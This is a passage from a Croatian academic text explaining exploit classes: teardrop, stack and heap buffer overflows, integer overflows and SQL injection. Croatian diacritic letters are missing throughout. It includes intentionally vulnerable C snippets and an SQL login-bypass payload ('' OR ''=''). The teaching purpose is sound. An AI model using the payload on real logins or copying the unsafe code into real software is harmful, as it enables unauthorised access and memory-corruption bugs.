paketa, to omoguuje ponovno sastavljanje paketa na drugoj strani. U ovom napadu napada postavlja
zbunjujuu udaljenost u jedan od fragmenata. Ako posluitelj koji prima takav paket nema plan za takav
sluaj rezultat e biti pad sustava. Windows 3.1x, Windows 95 i Windows NT operativni sustavi, kao i
Linux do verzije 2.0.32 i 2.1.63 ranjivi su na ovaj napad.
115

Teardrop attacks. http://en.wikipedia.org/wiki/Denial-of-service_attack#Teardrop_attacks. (preuzeto


07.03.2014.).

72

korijenom (eng. root)116. U veini informacijskih sustava superkorisnik je obino administrator


sustava117.
Pojedinim exploit-om obino se moe iskoristiti samo odreena ranjivost sustava. Ta se
ranjivost naknadno popravlja ''zakrpom'' u sustavu (eng. patch) kada postane poznata njegovom
autoru.. To je razlog zato neki zlonamjerni hakeri izbjegavaju objavljivanje vlastitih exploita
nego ih dra u tajnosti ili ogranieno ustupaju. Takvi uvani exploiti se nazivaju exploiti
nultog dana118 (eng. zero-day, 0-day exploit), a doi do istih najvea je elja nekvalificiranih
napadaa, esto nazivanih i script kiddies.
Script kiddies je argonski naziv za osobu koja ne barata posebnim tehnolokim
znanjima, ve nasumice trai specifine sigurnosne ranjivosti putem Interneta u nastojanju da
ostvari pristup nekom sustavu bez stvarnog razumjevanja to se zapravo postie i dogaa
njihovom uporabom. Ciljevi takvog napadaa nisu precizno odreene informacije niti neki
specifini cilj, ve samo plasiranje onih napada za iju izvedbu je uspio pronai adekvatni
exploit. Njihova aktivnost svodi se na beskonano traenje i pokuavanje plasiranja exploita na
one ciljeve koji su ranjivi na odreenu vrstu napada119.
Zlouporaba raunalnih sustava izvediva je na vie razina. Osim na razini operativnog
sustava, raunalo moe biti zlouporabljeno iskoritavanjem propusta u softveru koji se nalaze na
tom raunalu a broj razliitih exploita koji se ire putem interneta iskoritavajui odreene
ranjivost web aplikacija svakim je danom vei. Neka istraivanja pokazuju da vie od 90% web
aplikacija dostupnih na Internetu sadri barem jedan sigurnosni propust koji omoguuje
ugroavanje njihove sigurnosti, kao i sigurnosti ostalih korisnika koji pristupaju takvoj
aplikaciji120.
Posljedica raznih ranjivosti nautrb raunalne sigurnosti je da napada moe nainiti tetu
sadrajima na naem osobnom raunalu, usporiti njegov rad pa ak i uiniti ga neupotrebljivim,
116

CIS FER, (2011). Nadzor korisnika s poveanim ovlastima. CIS-DOC-2011-01-002.


http://www.cis.hr/files/dokumenti/CIS-DOC-2011-01-002.pdf. (preuzeto 07.04.2014.)., str. 5.
117

http://en.wikipedia.org/wiki/Superuser. 26.02.2014., (preuzeto 17.03.2014.).

118

http://en.wikipedia.org/wiki/Zero-day_attack. 14.03.2014., (preuzeto 17.03.2014.).

119

prema http://en.wikipedia.org/wiki/Script_kiddie. 21.02.2014., (preuzeto 17.03.2014.).

120

Posebice se ova tvrdnja odnosi na aplikacije bazirane na JAVA platformi.,


http://krebsonsecurity.com/2010/10/java-a-gift-to-exploit-pack-makers/. (preuzeto 17.03.2014.).

73

preuzeti nae datoteke ili bilo koje podatke (povjerljive dokumente, lozinke, brojeve kreditnih
kartica), nadzirati i upravljati naim web preglednikom, vriti sistemske naredbe na web
posluitelju itd.
Exploit-e moemo svrstati kroz vie podjela, a najee obzirom na nain kako dolazi u
kontakt sa ranjivim sustavom, i to u dvije kategorije dvije kategorije121:

Udaljeni exploit (eng. remote exploit) radi preko mree na daljinu i iskoritava
ranjivost sustava bez prethodnog pristupa istom.

Lokalni exploit (eng. local exploit) nuan je prethodni pristup ranjivom sustavu najee
u svrhu poveavanja - eskaliranja ovlasti njegovih korisnika (u odnosu na one dodijeljene
od administratora sustava).
Exploite moemo klasificirati i s obzirom na vrstu napada koja se koristi protiv ranjivog

sustava: neovlaten pristup podacima, izvoenje koda, uskraivanje posluivanja, itd. ili s
obzirom na mehanizme koji se koriste kako bi iskoristili ranjivost sustava. Neki od uobiajenih
vrsta exploita (napada) su122:

Prekoraenje kapaciteta meuspremnika na stogu (eng. buffer overflow);

Prekoraenje kapaciteta meuspremnika u gomili (eng. heap overflow);

Prekoraenje opsega cijelog broja (eng. integer overflow);

SQL injekcija (eng. SQL injection);

Napad formatiranim nizom znakova (eng. format string attack);

Cross-site scripting.

5.1 Prekoraenje kapaciteta meuspremnika na stogu


Stog je apstraktni tip podataka koji se esto koristi u raunarstvu. To je struktura u
memoriji kojoj se pojedini elementi uklanjaju redosljedom obrnutim od onoga kojim su bili
121

http://www.princeton.edu/~achaney/tmve/wiki100k/docs/Exploit_%28computer_security%29.html.
(preuzeto 17.03.2014.).
122

Zelanto, M. (2007). Zlouporaba ranjivosti raunalnih sustava.


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/index.html. (preuzeto 17.03.2014.).

74

dodavani, tako da se kao prvi uklanjaju oni koji su dodani strukturi kao poslijednji. Taj se
postupak oznaava i kao last in, first out (LIFO). Podaci se mogu dodavati tj. stavljati na vrh
stoga (eng. push) ili uzimati sa vrha (eng. pop). Stog se takoer koristi i za dinamiku alokaciju
lokalnih varijabli funkcija, za prenoenje parametara funkciji i za vraanje vrijednosti iz
funkcije123.
Slika 20: Organizacija procesa u memoriji

Izvor: http://os2.zemris.fer.hr/ns/malware/2007_zelanto/buffer.html#321
Stog je blok memorije koji sadri podatke. Pokaziva stoga (eng. Stack Pointer, SP)
pokazuje na vrh stoga, dok se dno stoga nalazi na nekoj fiksnoj memorijskoj adresi. Veliinu
stoga dinamiki odreuje jezgra operacijskog sustava (eng. kernel) za vrijeme izvoenja
procesa. Pri pozivu funkcije na stog se stavljaju logiki okviri stoga, a isti se pri povratku iz
funkcije skidaju sa stoga. Ti okviri sadre parametre funkcije, njene lokalne varijable i podatke
potrebne da bi se stog vratio u prethodno stanje nakon povratka iz pozvane funkcije124.
Ovisno o implementaciji, stog e rasti ili prema dolje (prema niim memorijskim
adresama) ili prema gore.
Uz pokaziva stoga, esto se koristi pokaziva okvira (eng. Frame Pointer, FP ili Local
Base pointer, LB) koji pokazuje na neko fiksno mjesto unutar okvira. Mnogi prevoditelji koriste
FP za referenciranje lokalnih varijabli i parametara funkcije zato to se njihove udaljenosti od
FP-a ne mijenjaju (za razliku od udaljenosti od SP-a). Zbog smjera u kojem raste stog, aktualni

123

http://www.windowsecurity.com/articlestutorials/windows_os_security/Analysis_of_Buffer_Overflow_Attacks.html. (preuzeto 17.03.2014.).


124

Zelanto, M., op. cit., 2. Vrste exploita.

75

parametri imaju pozitivne pomake, a lokalne varijable imaju negativne pomake u odnosu na
FP125.
Pri pozivanju funkcije, prvo se na stog stavljaju njeni argumenti to obrnutim redosljedom.
Naredba koja poziva funkciju stavlja na stog vrijednost instrukcijskog registra (eng. Instruction
Pointer, IP). Instrukcijski registar sadri adresu sljedee naredbe koja se treba izvriti po
povratku iz funkcije i u trenutku poziva funkcije predstavlja upravo povratnu adresu te
funkcije126.
Prva stvar koju funkcija mora uiniti, nakon to je pozvana, je spremiti prethodni FP na
stog (tako da se moe obnoviti staro stanje pri zavretku funkcije). Pohranjeni FP se naziva SFP
(eng. Saved FP). Zatim se kopira SP u FP da bi se stvorio novi FP i poveava se SP da bi se
rezerviralo mjesto za lokalne varijable. Ovaj postupak se naziva prolog procedure. Nakon
zavretka procedure, stog se mora ponovo ''oistiti'' to se naziva epilog procedure127.
Slika 21: Izgled stoga nakon poziva funkcije

Izvor: http://os2.zemris.fer.hr/ns/malware/2007_zelanto/buffer.html#321
Prekoraenje kapaciteta meuspremnika na stogu (eng. buffer overflow) je rezultat
pokuaja da u meuspremnik pohranimo vie podataka nego li on moe primiti. Kako se ova
esta programska pogreka moe iskoristiti prikazuje nam slijedei primjer:
void funkcija2(char *str)
{
125

loc. cit.

126

ibid. 3.2. Prekoraenje kapaciteta meuspremnika na stogu.

127

ibid. 3.2.2. Pozivi funkcija.

76

char buffer[16];
strcpy(buffer,str);
}
void main()
{
char velikiNiz[256];
int i;
for(i = 0; i < 255; i++)
velikiNiz[i] = 'A';
funkcija2(velikiNiz);
}128
Program u ovom primjeru sadri funkciju sa tipinom pogrekom koja moe biti uzrokom
prekoraenju kapaciteta meuspremnika na stogu. Funkcija kopira zadani niz znakova bez
prethodne provjere granica koristei strcpy(). Naredba strcpy() kopira sadraj niza *str
(velikiNiz[]) u buffer[] dok ne pronae oznaku kraja niza (eng. null character). Polje buffer[] je
dugo 16 bajtova, a u njega se pokuava kopirati 256 bajtova. Posljedica toga bit e da e se
prepisati jo 250 bajtova stoga, poslije buffer[]-a (ukljuujui SFP, povratnu adresu pa ak i
*str). velikiNiz je zapravo niz znakova 'A'. Hesadecimalna vrijednost znaka 'A' je 0x41, to znai
da e povratna adresa sada biti 0x41414141. Ova adresa je izvan memorijskog prostora procesa.
Zato kad se funkcija vrati i pokua proitati sljedeu naredbu sa te adrese dobit emo
segmentation violation. Dakle prekoraenje kapaciteta meuspremnika omoguava da se
promjeni povratna adresa funkcije, a samim time i tok izvoenja programa129.
Tehniki struan i zlonamjeran korisnik moe eksploatirati prekoraenje kapaciteta
bazirano na stogu kako bi manipulirao programom na jedan od sljedeih naina:

Ako se prepie neka lokalna varijabla koja je smjetena blizu privremenog spremnika u
memoriji na stogu, moe se promjeniti ponaanje programa na nain koji moe koristiti
napadau.

128

ibid., 3.2.3, Primjer 3.

129

ibid. 3.2.3. Prekoraenje meuspremnika.

77

Ako se prepie povratna adresa koja se nalazi na stogu. Jednom kad zavri funkcija,
izvoenje programa e se nastaviti od adrese koju je odredio napada, to je uglavnom
privremena memorija koju je napunio sam napada130.

Jedna od najranijih eksploatacija ovog tipa dogodila se 1988. Bio je to jedan od nekoliko
exploita kojeg je koristio Morrisov crv (eng. Morris worm131) da bi se irio po Internetu. Kasnije,
1995. Thomas Lopatic132 je nezavisno nanovo otkrio prekoraenje kapaciteta meuspremnika na
stogu i objavio svoja otkria na Bugtraq mailing listi. Godinu dana kasnije Elias Levy (takoer
poznat kao Aleph One) je u asopisu Phrack objavio lanak ''Razbijanje stoga zbog zabave i
dobitka'' (eng. "Smashing the Stack for Fun and Profit 133"), u kojem opisuje korak po korak
eksploataciju ranjivosti prekoraenja kapaciteta meuspremnika na stogu.
Od tada, najmanje dva vea internetska crva su eksploatirala ovu ranjivost da bi ugrozila
velik broj sustava. 2001. godine, Code Red134 crv koristio je prekoraenje meuspremnika u
Microsoft-ovom IIS 5.0 (eng. Internet Information Service), a 2003. godine SQL Slammer135 crv
je ugroavao strojeve na kojima se pokretao Microsoft SQL Server 2000.

U srpnju 2000. otkrivena je ranjivost na napad prekoraenja kapaciteta meuspremnika


kod Microsoft Outlook-a i Outlook Express-a. Programska pogreka uinila je moguim
napadau da ugrozi integritet ciljanog raunala tako da mu jednostavno poalje e-mail poruku.
Za razliku od tpinih e-mail virusa, korisnici se nisu mogli zatititi tako to ne bi otvorili
priloenu datoteku; naime, korisnik nije ak ni trebao proitati poruku da bi omoguio napad.
Mehanizam zaglavlja poruke je imao greku koja je omoguavala da poiljatelj preplavi to
podruje sa podacima, to mu je omoguavalo da izvrava bilo kakve programe na
primateljevom raunalu. Zbog toga to se proces aktivirao im bi primatelj skinuo poruku sa

130

loc. cit.

131

http://en.wikipedia.org/wiki/Morris_worm. (preuzeto 24.03.2014.).

132

http://en.wikipedia.org/wiki/Buffer_overflow. (preuzeto 24.03.2014.).

133

http://www.phrack.org/issues.html?issue=49&id=14#article. (preuzeto 24.03.2014.).

134

http://en.wikipedia.org/wiki/Code_Red_(computer_worm). (preuzeto 24.03.2014.).

135

http://en.wikipedia.org/wiki/SQL_Slammer. (preuzeto 24.03.2014.).

78

posluitelja, od ove vrste bilo se vrlo teko obraniti. Microsoft je tada napravio ''zakrpu'' koja
eliminira ovu ranjivost136.

Za razliku od stoga, u gomili se ne mogu prepisati memorijska podruja koja program


koristi izravno kao adresu skoka. On moe samo samo manipulirati podatke za upravljanje
gomilom137.
5.2 Prekoraenje kapaciteta meuspremnika u gomili (eng. heap overflow)

Gomila je zapravo podruje memorije koje se dinamiki alocira od strane programa.


Program dinamiki rezervira memoriju za meuspremnike u gomili. Nakon to je
programer napie program, on ne zna koji e se podaci pohraniti u meuspremnik u gomili, ve
je program napisan tako da prilagodi veliinu potrebnog prostora za vrijeme izvoenja
programa138. Ovisno o programskom jeziku, platformi i namjeni softvera, postoji izvjestan broj
funkcija koje se koriste da bi se rezervirao memorijski prostor. Neke od njih su (prema Zelanto,
2007.):

malloc(), calloc() i realloc() najee koritene funkcije u ANSI - C programima.


(ANSI C je standard kojeg je objavio ANSI (eng. American National Standards
Institute) za programski jezik C);

u programskom jeziku C++, operator new rezervira memoriju u gomili za niz ili nove
instance objekata;

u programskom jeziku Delphi koristi se GetMem() i New().


Pozivi ovih funkcija rezerviraju memoriju u virtualnom adresnom prostoru procesa i

zatim vraaju adresu te rezervirane memorije procesu. Nakon koritenja rezervirana memorija se
mora osloboditi (Zelanto, 2007).

136

http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html. (preuzeto
17.03.2014.).
137

Zelanto, M., op. cit., 4.4 Eksploatacija.

138

http://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap. (preuzeto
17.03.2014.).

79

U pravilu, operacijski sustav dodjeljuje svakom procesu gomilu odreene veliine, a ta se


veliina moe promijeniti za vrijeme izvoenja programa. Obino, knjinica sustava139 koja je
preslikana u adresni prostor procesa, kada je uitan, upravlja ovim postupkom i dijeli gomilu na
manja podruja kojima programer moe povoljnije rukovati (Zelanto, 2007).
Ako se premae granice memorijskog prostora na stogu koje je odredila jezgra
operacijskog sustava, doi e do povrede pristupa (eng. access violation) to najee uzrokuje
prekid izvoenja procesa. Meutim, u memorijskom prostoru gomile nema takvih granica pa ni
CPU ni jezgra ne mogu prepoznati da li je dolo do prekoraenja kapaciteta unutar gomile 140.
Nie je naveden jedan primjer (prema Zelanto, 2007):
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFSIZE 16
#define OVERSIZE 8

int main()

{
long diff;
char *buf1 = (char *)malloc(BUFSIZE);
char *buf2 = (char*)malloc(BUFSIZE);
diff=(long)buf2 - (long)buf1;
printf("buf1=%p,buf2=%p,diff=0x%x bytes\n",
buf1, buf2,diff);
memset(buf2, 'A', BUFSIZE-1);
buf2[BUFSIZE-1] = '\0';
printf("prije: buf2=%s\n", buf2);
memset(buf1,'B',(unsigned int)(diff+ OVERSIZE));
printf("poslije: buf2=%s\n", buf2);
return 0;
}141
139

Skupina implementiranih obrazaca ponaanja tj. procedura koje se jednom napisane mogu uvijek
iznova pozivati., http://en.wikipedia.org/wiki/Library_%28computing%29. (preuzeto 17.03.2014.).
140

Zelanto, M., op. cit. 4.1. Podruje gomile.

141

ibid. 4.2, Primjer 1.

80

Nakon izvoenja ovog programa, dobivamo neto slino slijedeem rezultatu:


buf1=0x804e000,buf2=0x804eff0,diff=0xff0 bytes
prije: buf2 = AAAAAAAAAAAAAAA
poslije: buf2 = BBBBBBBBAAAAAAA142
Ovo je temelj velikog broja prekoraenja kapaciteta u gomili. Na ovaj nain moemo
prepisati naziv datoteke, pohranjene podatke, i sl.
Poput prekoraenja kapaciteta meuspremnika na stogu, napadai mogu koristiti
prekoraenje granica u gomili da bi injektirali i izvrili bilo kakav kd. Naoko, ak i bezopasne
datoteke mogu skrivati vrlo opasne programe (Zelanto, 2007).
Pregledavanje slikovnih datoteka, na primjer, ini se kao bezopasni pothvat i ne
oekujemo da na taj nain moemo ''uhvatiti'' virus ili sl., jer naposlijetku, ne izvrava se nikakav
programski kd ve program za prikaz slika samo prevodi podatke u slikovnoj datoteci da bi
odredio boju nekoliko piksela na ekranu (Zelanto, 2007).
No ako program za prikaz slika nije napisan kako treba, nedoputene strukture podatataka
u slikovnoj datoteci mogu dovesti do prekoraenja meuspremnika. U najgorem sluaju,
slikovna datoteka moe biti vjeto nainjena s namjerom da ''prokrijumari'' strojni kd u sustav,
kojeg tada program za prikaz slika izvede (Zelanto, 2007).
Osnovni problem je taj, to sustav ''mijea'' varijable programa i meuspremnike zajedno
sa upravljakim podacima programa pa ako doe do prekoraenja granica meuspremnika,
postoji mogunost da e se prepisati upravljaki podaci, to moe za posljedicu imati neoekivan
uinak na to kako se program izvodi (Zelanto, 2007).
Dvije vrste pogreaka mogu izazvati prekoraenje meuspremnika u gomili: ili je veliina
rezervirane memorije stalna i napada moe osigurati da se previe podataka upie u
meuspremnik; ili se u izraunu koliko treba rezervirati memorije dogodila greka zbog toga to
se temeljio na informacijama koje je dao napada143.

142

loc. cit.

143

http://publib.boulder.ibm.com/infocenter/javasdk/tools/index.jsp?topic=%2Fcom.ibm.java.doc.igaa
%2F_1vg000131402ee-11e49e6e566-7fda_1001.html. (preuzeto 17.03.2014.).

81

Primjer opasnosti, koju prekoraenje kapaciteta gomile moe predstavljati za korisnika


raunala, je Microsoft JPEG GDI+ ranjivost koja moe omoguiti daljinjsko izvravanje koda.
Napada koji uspjeno eksploatira ovu ranjivost moe pomou nje dobiti iste ovlasti kako i
korisnik, ukoliko natjera korisnika da otvori posebno izraenu datoteku ili da pregleda direktorij
koji sadri tu datoteku (prema Zelanto, 2007).
DieHard144 te njegov nasljednik DieHarder145 softver za nadzor memorijske alokacije
iskljuuje, ili uvelike smanjuje vjerojatnost sigurnosnih ranjivosti nazivanih memorijske greke.
DieHard sprijeava da se odreene vrste pogreaka uope dogode. Takoer smanjuje mogunost
da e greka u programu imati ikakav uinak. DieHard radi tako da sluajno odreuje
memorijske lokacije za programske objekte tako da budu daleko jedan od drugog u memoriji.
Ovakvo rasprenje memorijskih objekata po cijelom memorijskom podruju uvelike smanjuje
mogunost dogaanja nekih greaka i ini gotovo nemoguim otkrivanje gdje se u memoriji
nalaze ranjivi dijelovi programa. Na ovaj nain mogue je sprijeiti veliki broj exploita (Zelanto,
2007).
Mnogi sustavi danas sprjeavaju jednostavne exploit-e tako to obavljaju dodatna
ispitivanja. Na primjer, povjeravaju da su pokazivai u gomili nepromjenjeni, prije nego ih
koriste, tj. provjeravaju da li prethodni blok pokazuje na trenutni, npr:
if ( this_block->prev-> next == this_block )146
No, niti jedna mjera provjere ne moe u potpunosti prevenirati prekoraenje kapaciteta
meuspremnika.
Poetkom 2004. godine otkriven je sigurnosni propust u vidu pogreke prepisivanja
gomile unutar shimgvw.dll sistemske knjinice (eng. system library) Windows Explorer-a koja
se koristi pregledavanja grafikih datoteka. Spomenuti nedostatak bilo je mogue iskoristiti
oblikovanjem zlonamjerne .emf (eng. Enhanced Metafile) grafike datoteke, nakon ega je
napada dolazio u mogunost izazivanja DoS stanja te izvoenja proizvoljnog programskog kda
na ranjivom sustavu147.
144

https://github.com/emeryberger/DieHard/. (preuzeto 17.03.2014.).

145

Proceedings of the 17th ACM Conference on Computer and Communications Security.


http://doi.acm.org/10.1145/1866307.1866371. (preuzeto 17.03.2014.).
146

Zelanto, M., op. cit. 4.5. Primjer.

82

Sigurnosni nedostatak primjeen je na Windows XP operacijskim sustavima Home,


Home SP1, Media Center Edition, Professional i Professional SP1. Ukoliko bi .emf grafika
datoteka u atributu "total size" sadravala vrijednost koja je bila manja od veliine zaglavlja
dolazilo je do prepisivanja gomile te ruenja explorer.exe procesa.
5.3 Prekoraenje kapaciteta cijelog broja ( eng. integer overflow)

Prekoraenje opsega cijelog broja (eng. integer overflow) ili tzv. preljev, kod raunala
oznaava stanje koje nastaje uslijed aritmetike operacije koja rezultira cifrom izvan opsega
brojeva koji se mogu pohraniti u registar ili na neku memorijsku lokaciju 148. Na primjer, nbitni
registar moe poprimiti broj iz intervala od 0 do (2 N 1) ukoliko su brojevi prikazani prirodnim
binarnim kodom (eng. Natural Binary Code, NBC) ili broj iz intervala od (2N-1) do (2N-1 - 1),
ukoliko su brojevi u registru prikazani dvojnim komplementom. Ako aritmetika operacija
proizvede rezultat koji nije u tom opsegu brojeva, dolo je do preljeva. Iznos za koji je izraunata
vrijednost vea od opsega brojeva, a koji se moe prikazati, takoer se naziva preljev i on se
moe pohraniti na neku lokaciju u memoriji149.
Prekoraenje opsega cijelog broja (eng. integer overflow) je oblik aritmetikog preljeva.
Ako, na primjer najveem broju koji se moe prikazati pribrojimo neki pozitivni broj, nastat e
preljev ili prekoraenje opsega cijelog broja. Neki procesori e u sluaju preljeva ui u zasienje,
tj. kada se dosegne najvei prikazivi broj, svaki pokuaj da se taj broj uvea vratit e kao rezultat
taj isti, maksimalni broj. Isto vrijedi i za minimalnu vrijednost (Zelanto, 2008).
Primjer ovog nalazimo u raunalnoj grafici ili pri obradi signala, gdje se uglavnom radi sa
podacima ije vrijednosti se nalaze unutar intervala od 0 do 1 ili intervala od -1 do 1. Neka na
primjer imamo sliku u nijansama sive boje, gdje 1 predstavlja crnu, a 0 bijelu boju, dok sve
vrijednosti izmeu predstavljaju razne nijanse sivila. Ako elimo npr. posvijetliti sliku zapravo
mnoimo vrijednost svakog piksela sa odreenom konstantom. Aritmetika zasienja, dozvoljava
da se vrijednost svakog piksela ''slijepo'' pomnoi sa konstantom, bez straha da e doi do
preljeva, jer svi oni pikseli ija je vrijednost vea od 1, tj. tamniji od crne, postaju crni, a svi
manji od 0, tj. svijetliji od bijele jednostavno postaju bijeli (Zelanto, 2008).
147

Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution,
(2004)., http://securitytracker.com/id/1009181. (preuzeto 17.03.2014.).
148

http://en.wikipedia.org/wiki/Integer_overflow, 17.02.2014., (preuzeto 17.03.2014.).

149

Zelanto, M., op. cit., 5. Prekoraenje kapaciteta cijelog broja.

83

Veliina registara procesora odreuje opseg vrijednosti brojeva koji se mogu prikazati.
Tipine veliine registara su 8, 16, 32, 64 i 128 bita. S obzirom da su cijeli brojevi (eng. integer)
uvijek iste veliine, (najee 4 bajta u 32 bitnim procesorim), postoji neka maksimalna
vrijednost koju mogu poprimiti. ISO C99150 norma kae da preljev cijelog broja uzrokuje
''nedefinirano ponaanje'', to znai da prevoditelji koji su u skladu sa ovim standardom mogu
uiniti to god ele od toga da potpuno ignoriraju preljev pa sve do toga da prekinu izvoenje
programa. Veina prevoditelja ignorira preljev i pohranjuje neoekivane ili netone rezultate
(Zelanto, 2008).
Nedefinirano ponaanje je svojstvo nekih programskih jezika, od kojih je najpoznatiji
programski jezik C, u kojima, da bi se pojednostavio tehniki opis i dopustio odreen stupanj
fleksibilnosti u implementaciji, specifikacija izriito ostavlja rezultat pojedinih operacija
nedefiniranim (npr. dijeljnje s nulom) (Zelanto, 2008).
Prekoraenja kapaciteta cijelog broja mogu biti iznimno opasna i to djelomino zbog toga
to ih je nemogue otkriti jednom kad se dogode. Ako doe do preljeva, program ne moe znati
da je izraun zbog preljeva pogrean pa nastavit e s izvoenjem kao da je sve u redu (Zelanto,
2008).
Pogrean izraun moe biti opasan ako se rezultat koristi za npr. odreivanje veliine
meuspremnika ili odreivanje indeksa polja. U veini sluajeva pogreke ovog tipa se ne mogu
eksploatirati jer se memorija ne prepisuje direktno, ali ponekad one mogu voditi ka drugim
klasama pogreaka kao to je na primjer prekoraenje kapaciteta meuspremnika (Zelanto,
2008).
Iako ih je vrlo teko eksploatirati, preljevi cijelog broja mogu prouzroiti neoekivano
ponaanje i ugroziti sigurnost sustava.
Pri eksploataciji se obino koristi cijeli broj (s predznakom ili bez) kao ulaz koji e
izazvati odreen oblik ranjivost sustava, tj. preljev pri pisanju ili ''curenje informacija'' pri itanju
iz privremene memorije, to se moglo sprijeiti da je izvrene provjera granica (Zelanto, 2008).
Jedan od najeih naina na koji se aritmetiki preljevi mogu eksploatirati je kad se
izraun odnosi na to koliko velik treba biti meuspremnik za koji rezerviramo memoriju. esto
program treba zauzeti prostor u memoriji za polje objekata, pa koristi funkcije poput malloc() ili
150

http://en.wikipedia.org/wiki/C99. (preuzeto 20.03.2014.).

84

calloc() da bi rezervirao prostor i rauna koliki bi taj prostor trebao biti tako da pomnoi broj
elemenata sa veliinom objekta. Kao to je pokazano prethodno, ako moemo kontrolirati
bilokoji od operanada (broj elemenata ili veliinu objekta) lako postiemo pogreku u izraunu
zbog koje e se zauzeti pogrena koliina memorijskog prostora, kao to je prikazano u
sljedeem programskom odsjeku151:
int mojaFunkcija(int *array, int duljina)
{
int *myArray, i;
myArray = malloc(duljina * sizeof(int)); /* [1] */
if(myarray == NULL)
{
return -1;
}
for(i = 0; i < duljina; i++) /* [2] */
{
myarray[i] = array[i];
}
return myarray;
}
Ova naizgled bezazlena funkcija moe biti uzrokom propasti sustava zboga to ne obavlja
provjeru duljine parametara duljina. Mnoenje kod [1] e prouzroiti preljev ukoliko je
parametar duljina dovoljno velik. Koristei preljev napada e namjestiti duljinu polja myArray
tako da petlja kod [2] prepie memoriju iza granice kraja meuspremnika myArray, to e
izazvati prekoraenje u gomili (eng. heap overflow). Ovo moe utjecati na izvoenje
proizvoljnog programskog kda na pojedinim implementacijama tako to prepie malloc
kontrolne strukture (Zelanto, 2008.).
U svibnju 2007. uoen je sigurnosni nedostatak kod programskog paketa GIMP152. GIMP
(GNU Image Manipulation Program) je besplatan paket otvorenog koda, distribuiran pod GPL

151

Zelanto, M., op. cit., 5.1, Primjer 1.

152

www.gimp.org. (preuzeto 16.03.2014.).

85

(eng. GNU General Public License) licencom, namijenjen obradi rasterske grafike na
raunalima.
Sigurnosni nedostatak paketa GIMP moe biti iskoriten za nanoenje tete korisnicima.
Radi se o prepisivanju programske gomile koju uzrokuje pojava pogreke prepisivanja
cjelobrojne varijable (eng. integer overflow). Neodgovarajua implementacija kda nalazi se
unutar funkcije "seek_to_and_unpack_pixeldata()" koja je sastavnica "plug-ins/common/psd.c"
datoteke izvornog kda, a namijenjena je obradi PSD (eng. Photoshop Document) slikovnih
datoteka. Za uspjeno iskoritavanje, bilo je potrebno najprije uvjeriti rtvu na otvaranje
zlonamjerno oblikovane datoteke. Ranjive su bile GIMP 2.2.15 i sve ranije inaice paketa153.
Opisana ranjivost udaljenom napadau omoguuje izvoenje potencijalno opasnih
aktivnosti na ranjivom raunalu. Razlog tomu je pogreka prepisivanja cjelobrojne varijable koja
se moe pojaviti za vrijeme obrade PSD datoteka. Uzrok pojavi propusta je neodgovarajua
obrada velikih iznosa vrijednosti koje opisuju duljinu ili irinu slike sadrane u PSD datoteci.
Konano, to vodi ka pojavi pogreke prepisivanja spremnika programske gomile (Zelanto,
2008).

5.4 SQL154 injekcija (eng. SQL injection)

SQL injekcija je tehnika koja omoguuje napadau da izvrava neautorizirane SQL upite
iskoritavajui neprovjeravanje ulaza u Web aplikacijama koje grade dinamike SQL upite.
Ranjivost je prisutna kod korisnikog unosa koji se nekorektno provjerava, i na taj nain unesu
podaci u koje su ubaeni u obliku SQL naredaba upiti koji vre nedozvoljene radnje ili ako
korisniki ulaz nije dovoljno provjeravan i time neoekivano je dolo do izvravanja SQL
upita155.

153

GIMP integer overflow vulnerability, https://www.kb.cert.org/vuls/id/399896. (preuzeto 17.03.2014.).

154

SQL (Structured Query Language) najpopularniji raunalni jezik za izradu, traenje, auriranje i
brisanje podataka iz relacijskih baza podataka, http://hr.wikipedia.org/wiki/SQL. (preuzeto 17.03.2014.).
155

Klari, I. (2007). Naini zlouporabe ranjivosti raunalnog sustava.


http://os2.zemris.fer.hr/ns/malware/2007_klaric/sql_injekcija.html. (preuzeto 07.04.2014.).

86

To je tehnika koja eksploatira sigurnosnu ranjivost u sloju baze podataka aplikacije.


Upisivanjem odgovarajueg teksta u polja obrasca koji aplikacija koristi u svojim SQL upitima,
upiti iz baze vraaju podatke koje inae ne bi. Kao i veina hakerskih postupaka, poiva na
metodi pokuaja i pogreaka i temelji se na pogaanju strukture SQL upita i imena atributa i
tablica. Navesti e se neke njene osnovne inaice156.
Slika 22: SQL injekcija

Izvor: http://os2.zemris.fer.hr/ns/malware/2007_zelanto/sql.html
5.4.1 Zaobilaenje autorizacije

Najjednostavnija tehnika SQL injekcije je zaobilaenje prijave (eng. logon form)


(Zelanto, 2008).
Slijedei programski kd predstavlja jedan od naina njene primjene:
SQLQuery = "SELECT Username FROM Users
WHERE Username = " & strUsername & "
AND Password = " & strPassword & ""
strAuthCheck = GetQueryResult(SQLQuery)
If strAuthCheck = ""
Then boolAuthenticated = False

156

http://en.wikipedia.org/wiki/SQL_injection. (preuzeto 24.03.2014.).

87

Else boolAuthenticated = True


End If 157
Nakon to korisnik preda korisniko ime i lozinku ispituje se tablica Users da bi se
doznalo da li postoji red sa sa tim korisnikim imenom i lozinkom. Ako je takav red pronaen,
tada se korisniko ime pohranjuje u varijablu strAuthCheck, koja oznaava da je korisnik trebao
autentificiran. Ako ne postoji red koji sadri zadane korisnike podatke, strAuthCheck e biti
prazan i korisnik se nee autentificirati (Zelanto, 2008).
Ako strUsername i strPassword nemaju ogranienja, tj. mogu sadravati bilo kakve
znakove, pa tada moe modificirati struktura aktualnog SQL upita tako da se ''proe''
autentifikaciju iako valjano korisniko ime i lozinka nisu poznati (Zelanto, 2008).
Takoer, moemo modificirati upit tako da uvijek daje istinu i uvijek emo se moi
prijaviti bez obzira na uneene podatke. Takav upit bi mogao izgledati ovako:
SELECT Username FROM Users WHERE Username = '' OR''=''
AND Password = '' OR ''=''
Ovim se postie da kao rezultat dobijem uvijek istinu i omogueno nam je
prijavljivanje u sustav. Kao korisniko ime i lozinku smo upisali OR '' = '', to znai da e prazan
string uvijek biti prazan string i uvijek emo se moi prijaviti u sustav158.
5.4.2 Koritenje SELECT naredbe

U nekim situacijama, trebamo na temelju povratne poruke koja opisuje pogreku


primijeniti obrnuti ininjering na SQL upite koji su ranjivi. Da bi to uinili, moramo znati kako
protumaiti poruku koja opisuje greku i kako u skladu s tim promijeniti injection string
(Zelanto, 2008).

157

Zelanto, M., op. cit. 7. 1. 1. Zaobilaenje autorizacije.

158

